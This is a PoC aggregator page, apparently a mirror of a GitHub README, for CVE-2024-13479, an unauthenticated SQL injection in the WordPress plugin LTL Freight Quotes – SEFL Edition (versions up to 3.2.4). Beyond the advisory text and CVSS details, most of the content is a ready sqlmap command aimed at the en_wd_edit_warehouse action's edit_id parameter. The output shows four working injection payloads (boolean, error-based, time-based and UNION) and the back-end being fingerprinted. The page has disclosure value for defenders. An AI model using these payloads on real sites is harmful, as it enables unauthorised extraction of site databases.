POC详情: cfcc4f88ba3710a16ac9970e1e6aea0b0c6b2d8a

来源
https://github.com/RandomRobbieBF/CVE-2024-13479
关联漏洞
标题: LTL Freight Quotes – SEFL Edition <= 3.2.4 版本未经身份验证的SQL注入漏洞 (CVE-2024-13479)
描述:适用于WordPress的LTL Freight Quotes – SEFL Edition插件在所有版本中(包括3.2.4版)存在SQL注入漏洞,原因是在处理用户提供的参数时未进行充分的转义,且现有的SQL查询准备不充分。攻击者可以通过'dropship_edit_id'和'edit_id'参数,在已有的SQL查询中附加额外的SQL查询,从而从数据库中提取敏感信息。此漏洞允许未认证的攻击者执行SQL注入攻击。
描述
LTL Freight Quotes – SEFL Edition <= 3.2.4 - Unauthenticated SQL Injection
介绍
# CVE-2024-13479
LTL Freight Quotes – SEFL Edition <= 3.2.4 - Unauthenticated SQL Injection

# Description

The LTL Freight Quotes – SEFL Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.2.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

## Details

- **Type**: plugin
- **Slug**: ltl-freight-quotes-sefl-edition
- **Affected Version**: 3.2.4
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2024-13479
- **Status**: Active

POC
---

```
sqlmap.py -u 'http://kubernetes.docker.internal:8929/wp-admin/admin-ajax.php' --data='action=en_wd_edit_warehouse&edit_id=1&wp_nonce=13db5f2e7d' --level=2 --dbms='MySQL '

[*] starting @ 15:35:17 /2025-02-20/

[15:35:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: edit_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=en_wd_edit_warehouse&edit_id=1 AND 8084=8084&wp_nonce=13db5f2e7d

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: action=en_wd_edit_warehouse&edit_id=1 AND GTID_SUBSET(CONCAT(0x7170787171,(SELECT (ELT(3874=3874,1))),0x717a627171),3874)&wp_nonce=13db5f2e7d

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=en_wd_edit_warehouse&edit_id=1 AND (SELECT 8170 FROM (SELECT(SLEEP(5)))Gvfy)&wp_nonce=13db5f2e7d

    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: action=en_wd_edit_warehouse&edit_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787171,0x6e57584a4f524f56504572467179796c6a6c6c527872646a73464444414144707067736542565243,0x717a627171),NULL,NULL,NULL,NULL,NULL-- -&wp_nonce=13db5f2e7d
---
[15:35:18] [INFO] testing MySQL
[15:35:18] [INFO] confirming MySQL
[15:35:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP 8.2.21, Apache 2.4.59
back-end DBMS: MySQL >= 8.0.0

```
文件快照

 [4.0K]  /data/pocs/cfcc4f88ba3710a16ac9970e1e6aea0b0c6b2d8a
└── [2.5K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。